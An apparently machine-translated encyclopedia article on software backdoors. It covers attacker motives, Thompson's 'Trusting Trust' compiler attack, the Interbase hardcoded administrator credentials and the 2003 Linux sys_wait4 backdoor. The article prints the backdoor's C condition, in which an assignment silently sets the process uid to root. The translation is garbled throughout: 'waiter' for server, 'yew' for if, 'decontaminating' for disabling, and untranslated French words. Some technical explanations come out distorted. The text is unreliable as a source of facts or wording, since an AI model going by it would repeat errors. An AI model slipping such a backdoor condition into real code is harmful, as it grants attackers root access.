Hidden door

In a Logiciel a hidden door (of the English backdoor , literally carries of behind ) is an unknown functionality of the legitimate Utilisateur, which gives a secret access to the software. In Computer security, the hidden door can be regarded as a type of Trojan horse.

Technique

An hidden door can be introduced either by the Développeur of the software, or by a third, typically a Hacker. The person knowing the hidden door can use it to supervise the activities of the software, to even take control of it (by skirting of the Authentification). Lastly, according to the extent of the rights that the Operating system gives to the software containing the hidden door, control can extend to the unit from the operations from the Ordinateur.

The generalization of the setting in network of the computers makes the hidden doors definitely more useful than of time when a physical access to the computer was the rule.

Among the motivations leading the developers of software to create hidden doors, it a:

  1. the interest practices there of an easy access and always opened to the software to be able to take effectively the actions of Maintenance.
  2. the possibility surreptitiously of decontaminating the software in the event of dissension with its customer (non-payment of license).

Among the motivations leading the hackers to install an hidden door:

  1. the possibility of supervising what the Utilisateur does legitimates and of copying or of destroying data having a value (passwords, key private to decipher private messages, coordinates banking, commercial secrets).
  2. the possibility of taking the control of a computer and being able to use it to take actions malfaisantes (sending of Pourriel S in particular for the Hameçonnage, of Computer virus S, Denial-of-service).
  3. the control of a vast computer network (see Botnet ), which can be used for blackmail with the Denial-of-service distributed (DDoS), or resold with criminals.

To install hidden doors in mass, the hackers use worms. Those are spread automatically and install a data-processing Serveur on each infected computer. Then the pirate can connect himself through Internet to the waiter.

An hidden door can also be inserted by way of Easter egg, of Compilateur (see the section lower the case of the compiler C Unix: Trusting Trust ), or can take the form of a program, like Back Orifice.

The case of the Compiler C Unix: Trusting Trust

In 1984, the American Data processing specialist Kenneth Thompson described, in its article Reflections one Trusting Trust , how it would have been possible to insert a hidden door in all the programs in C compiled on Unix. Moreover, considering the updated versions of this Compilateur, which is anything else only another compiled program, are compiled starting from the compiler C preexistent, the algorithm of insertion of the hidden door would have been made transmit of an update to another. Therefore, if this compiler at hidden door “had been released in nature” (in English: released in the wild ) in the beginning, then any compiler of C would possibly insert hidden doors nowadays.

  • Of the characteristics of this fictitious compiler, is notable the fact that the hidden door presents in any program C compiled never appears in the Source code out of C.

  • name trust (for confidence ) comes owing to the fact that the compiler C of origin is regarded by its End user as a block box worthy of confidence.

  • Is a Programmeur which does not include/understand the operation of such a Compilateur, but trusts him. It would be difficult for him to detect that a program, that it wrote itself then compiled, contains an hidden door.

Source: Kenneth Thompson, Reflections one Trusting Trust , Communication off the ACM, vol. 27, No 8, August 1984, pp. 761-763.

Notable businesses

Interbase

An hidden door was discovered in DBMS Interbase the January 10th 2001 at the time of the opening of the source code by its editor, Borland. It was enough to enter the name of user “politically” and the “correct” password to connect itself as an administrator. The fault existed since 1994.

Linux

In November 2003, an hidden door was found in Linux. Extremely fortunately, it was detected very quickly, before a version of Linux is put in production. The hidden door was grafted very synthetically: it consists of two lines of Langage C, added to the function sys_wait4 of the file “kernel/exit.c”: yew ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = - EINVAL;

The condition (current->uid = 0) is supposed being read by a particularly naive reader as a comparison “if the number of user of the process is 0 (root)” but actually means in language C the assignment “the number of user of the process becomes 0 (root)”. The result is that if this function sys_wait4 () faked were called with the parameters __WCLONE|__WALL, the process took the identity of root, the super-user, having so maximum rights of access.

Actually, this is not carried out exactly in the two preceding lines, because Linux uses several flags, the capabilities and not the number of user to know if a process can exceed a rule of access control. The process would not have in fact have any specific right in addition to those of number of user 0 (root): to handle the files belonging to root, the processes pertaining to root… what is very important for a breach of security but has nothing to do with the concept of super-user .

This allegedly subtle modification was to be read by a hypothetical programmer beginning out of C, having been formed with computer programming languages where the test of equality is written = (Pascal, Ada, ml…) and not == (C, C++, Java…). It goes without saying a programmer at this initial point does not work (or should not never work) on the sources of the Linux core. In fact, the language C being the computer programming language more used on the system of the Unix family, very few noninitial users (including those not working on the core) would have been let take.

Moreover, the collective development process of a software (in particular that of a free software) imposes that each modification is validated; it must for that have a legitimate justification. Thus, any modification, so tiny is it, will appear in the diff and will raise legitimate interrogations, if it does not have a clear justification.

With the cinema

  • the scenario of American film WarGames rests on an hidden door. The originator of a military computing system inserts there an hidden door in the form of a Password not-documented which gives access to it. This password gives also access to not-documented functionalities of the program, which gives to the control system of armament the appearance of a Video game of simulation of war.

External bonds

  • Article in transfert.net on the hidden door in Interbase

  • Article in kerneltrap.org on the hidden door in Linux

Random links:I Liheslaturan Guåhan | Nightjar | Paul Dandré | Sge | Asphalts (film, 1929) | La_loi_de_Parkinson